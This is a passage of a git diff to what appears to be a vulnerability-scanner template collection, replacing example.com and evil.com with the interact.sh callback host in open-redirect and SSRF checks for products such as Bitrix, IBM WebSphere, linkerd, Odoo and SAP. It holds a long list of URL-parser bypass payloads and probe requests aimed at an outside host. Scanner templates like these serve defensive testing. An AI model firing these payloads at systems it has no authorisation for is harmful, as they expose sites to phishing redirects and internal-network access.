'https:///interact.sh@interact.sh/%2f%2e%2e' + - 'https://:80#@interact.sh/' + - 'https://:80?@interact.sh/' + - 'https://:@\@interact.sh' + - 'https://:@interact.sh\@interact.sh' + - 'https://:@interact.sh\@WillBeReplaced.com' + - 'https://;@interact.sh' + - 'https://\tinteract.sh/' + - 'https://interact.sh/interact.sh' + - 'https://interact.sh/https://interact.sh/' + - 'https://www.\.interact.sh' + - 'https:/\/\interact.sh' + - 'https:/\interact.sh' + - 'https:/interact.sh' + - 'https:interact.sh' + - '{{RootURL}}interact.sh' + - '〱interact.sh' + - '〵interact.sh' + - 'ゝinteract.sh' + - 'ーinteract.sh' + - 'ーinteract.sh' + - '?page=interact.sh&_url=interact.sh&callback=interact.sh&checkout_url=interact.sh&content=interact.sh&continue=interact.sh&continueTo=interact.sh&counturl=interact.sh&data=interact.sh&dest=interact.sh&dest_url=interact.sh&dir=interact.sh&document=interact.sh&domain=interact.sh&done=interact.sh&download=interact.sh&feed=interact.sh&file=interact.sh&host=interact.sh&html=interact.sh&http=interact.sh&https=interact.sh&image=interact.sh&image_src=interact.sh&image_url=interact.sh&imageurl=interact.sh&include=interact.sh&langTo=interact.sh&media=interact.sh&navigation=interact.sh&next=interact.sh&open=interact.sh&out=interact.sh&page=interact.sh&page_url=interact.sh&pageurl=interact.sh&path=interact.sh&picture=interact.sh&port=interact.sh&proxy=interact.sh&redir=interact.sh&redirect=interact.sh&redirectUri=interact.sh&redirectUrl=interact.sh&reference=interact.sh&referrer=interact.sh&req=interact.sh&request=interact.sh&retUrl=interact.sh&return=interact.sh&returnTo=interact.sh&return_path=interact.sh&return_to=interact.sh&rurl=interact.sh&show=interact.sh&site=interact.sh&source=interact.sh&src=interact.sh&target=interact.sh&to=interact.sh&uri=interact.sh&url=interact.sh&val=interact.sh&validate=interact.sh&view=interact.sh&window=interact.sh&redirect_to=interact.sh&ret=interact.sh&r2=interact.sh&img=interact.sh&u=interact.sh&r=interact.sh&URL=interact.sh&AuthState=interact.sh' stop-at-first-match: true matchers-condition: and @@ -111,7 +111,7 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - type: status status: diff --git a/vulnerabilities/httpbin/httpbin-open-redirect.yaml b/vulnerabilities/httpbin/httpbin-open-redirect.yaml index 08aff96109..961d4ae06f 100644 --- a/vulnerabilities/httpbin/httpbin-open-redirect.yaml +++ b/vulnerabilities/httpbin/httpbin-open-redirect.yaml @@ -15,13 +15,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/redirect-to?url=https%3A%2F%2Fexample.com" + - "{{BaseURL}}/redirect-to?url=https%3A%2F%2Finteract.sh" matchers-condition: and matchers: - type: dsl dsl: - - 'location == "https://example.com"' + - 'location == "https://interact.sh"' - type: status status: diff --git a/vulnerabilities/ibm/ibm-websphere-ssrf.yaml b/vulnerabilities/ibm/ibm-websphere-ssrf.yaml index 777b9a5e06..a387ce201c 100644 --- a/vulnerabilities/ibm/ibm-websphere-ssrf.yaml +++ b/vulnerabilities/ibm/ibm-websphere-ssrf.yaml @@ -11,8 +11,8 @@ info: requests: - method: GET path: - - '{{BaseURL}}/docpicker/internal_proxy/http/example.com' - - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/example.com' + - '{{BaseURL}}/docpicker/internal_proxy/http/interact.sh' + - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/interact.sh' redirects: true max-redirects: 2 @@ -26,4 +26,4 @@ requests: - type: word words: - - "Example Domain" \ No newline at end of file + - "

Interactsh Server

" \ No newline at end of file diff --git a/vulnerabilities/linkerd/linkerd-ssrf.yaml b/vulnerabilities/linkerd/linkerd-ssrf.yaml index ec72073405..23f52c1e15 100644 --- a/vulnerabilities/linkerd/linkerd-ssrf.yaml +++ b/vulnerabilities/linkerd/linkerd-ssrf.yaml @@ -13,7 +13,7 @@ requests: path: - "{{BaseURL}}" headers: - l5d-dtab: /svc/* => /$/inet/example.com/443 + l5d-dtab: /svc/* => /$/inet/interact.sh/443 matchers-condition: or matchers: diff --git a/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml b/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml index 290e17322f..b1dbdbf43a 100644 --- a/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml +++ b/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml @@ -12,10 +12,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/webadmin/authportal/bounce.php?url=https://example.com/" + - "{{BaseURL}}/webadmin/authportal/bounce.php?url=https://interact.sh/" matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' diff --git a/vulnerabilities/other/aspnuke-openredirect.yaml b/vulnerabilities/other/aspnuke-openredirect.yaml index e6ce2c4e2f..1dcc28d81d 100644 --- a/vulnerabilities/other/aspnuke-openredirect.yaml +++ b/vulnerabilities/other/aspnuke-openredirect.yaml @@ -9,10 +9,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/gotoURL.asp?url=example.com&id=43569" + - "{{BaseURL}}/gotoURL.asp?url=interact.sh&id=43569" matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*)$' \ No newline at end of file + - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*)$' \ No newline at end of file diff --git a/vulnerabilities/other/bitrix-open-redirect.yaml b/vulnerabilities/other/bitrix-open-redirect.yaml index 676932a520..3ddf1a643c 100644 --- a/vulnerabilities/other/bitrix-open-redirect.yaml +++ b/vulnerabilities/other/bitrix-open-redirect.yaml @@ -12,25 +12,25 @@ info: requests: - method: GET path: - - '{{BaseURL}}/bitrix/rk.php?goto=https://example.com' - - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com' - - '{{BaseURL}}/bitrix/redirect.php?event3=352513&goto=https://example.com' - - '{{BaseURL}}/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com' - - '{{BaseURL}}/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com' - - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com' - - '{{BaseURL}}/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com' - - '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com' - - '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com' - - '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com' - - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com' - - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com' + - '{{BaseURL}}/bitrix/rk.php?goto=https://interact.sh' + - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://interact.sh' + - '{{BaseURL}}/bitrix/redirect.php?event3=352513&goto=https://interact.sh' + - '{{BaseURL}}/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://interact.sh' + - '{{BaseURL}}/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://interact.sh' + - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://interact.sh' + - '{{BaseURL}}/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://interact.sh' + - '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://interact.sh' + - '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://interact.sh' + - '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://interact.sh' + - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh' + - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh' stop-at-first-match: true matchers-condition: and matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header - type: status diff --git a/vulnerabilities/other/dedecms-openredirect.yaml b/vulnerabilities/other/dedecms-openredirect.yaml index 689d98efa2..f240d95c4d 100644 --- a/vulnerabilities/other/dedecms-openredirect.yaml +++ b/vulnerabilities/other/dedecms-openredirect.yaml @@ -14,13 +14,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo=" + - "{{BaseURL}}/plus/download.php?open=1&link=aHR0cHM6Ly9pbnRlcmFjdC5zaA==" matchers-condition: and matchers: - type: word words: - - "Location: https://evil.com" + - "Location: https://interact.sh" part: header - type: status diff --git a/vulnerabilities/other/homeautomation-v3-openredirect.yaml b/vulnerabilities/other/homeautomation-v3-openredirect.yaml index 539e6eb49d..f73aa868e7 100644 --- a/vulnerabilities/other/homeautomation-v3-openredirect.yaml +++ b/vulnerabilities/other/homeautomation-v3-openredirect.yaml @@ -12,10 +12,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/" + - "{{BaseURL}}/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://interact.sh/" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header diff --git a/vulnerabilities/other/odoo-cms-redirect.yaml b/vulnerabilities/other/odoo-cms-redirect.yaml index 3fecc9364a..431683a7c5 100644 --- a/vulnerabilities/other/odoo-cms-redirect.yaml +++ b/vulnerabilities/other/odoo-cms-redirect.yaml @@ -13,10 +13,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/website/lang/en_US?r=https://example.com/" + - "{{BaseURL}}/website/lang/en_US?r=https://interact.sh/" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header diff --git a/vulnerabilities/other/otobo-open-redirect.yaml b/vulnerabilities/other/otobo-open-redirect.yaml index f18da7474c..07698281aa 100644 --- a/vulnerabilities/other/otobo-open-redirect.yaml +++ b/vulnerabilities/other/otobo-open-redirect.yaml @@ -13,10 +13,10 @@ info: requests: - method: GET path: - - '{{BaseURL}}/otobo/index.pl?Action=ExternalURLJump;URL=http://www.example.com' + - '{{BaseURL}}/otobo/index.pl?Action=ExternalURLJump;URL=http://www.interact.sh' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/vulnerabilities/other/pollbot-redirect.yaml b/vulnerabilities/other/pollbot-redirect.yaml index c11e6df5d3..251cdd6ee3 100644 --- a/vulnerabilities/other/pollbot-redirect.yaml +++ b/vulnerabilities/other/pollbot-redirect.yaml @@ -13,14 +13,14 @@ info: requests: - method: GET path: - - '{{BaseURL}}/%0A/example.com/' + - '{{BaseURL}}/%0A/interact.sh/' matchers-condition: and matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - type: status status: diff --git a/vulnerabilities/other/sap-redirect.yaml b/vulnerabilities/other/sap-redirect.yaml index 906e0b928c..fdb3dab9d7 100644 --- a/vulnerabilities/other/sap-redirect.yaml +++ b/vulnerabilities/other/sap-redirect.yaml @@ -11,7 +11,7 @@ requests: - method: GET path: - - "{{BaseURL}}/sap/public/bc/icf/logoff?redirecturl=https://example.com" + - "{{BaseURL}}/sap/public/bc/icf/logoff?redirecturl=https://interact.sh" matchers-condition: and matchers: @@ -22,7 +22,7 @@ requests: - type: word words: - - "Location: https://www.example.com" - - "Location: https://example.com" + - "Location: https://www.interact.sh" + - "Location: https://interact.sh" condition: or part: header diff --git a/vulnerabilities/other/thinkific-redirect.yaml b/vulnerabilities/other/thinkific-redirect.yaml index 90dc713ceb..a5baf35e95 100644 --- a/vulnerabilities/other/thinkific-redirect.yaml +++ b/vulnerabilities/other/thinkific-redirect.yaml @@ -10,7 +10,7 @@ requests: - method: GET path: - - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://evil.com" + - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://interact.sh" matchers-condition: and matchers: @@ -19,6 +19,6 @@ requests: - 302 - type: word words: - - "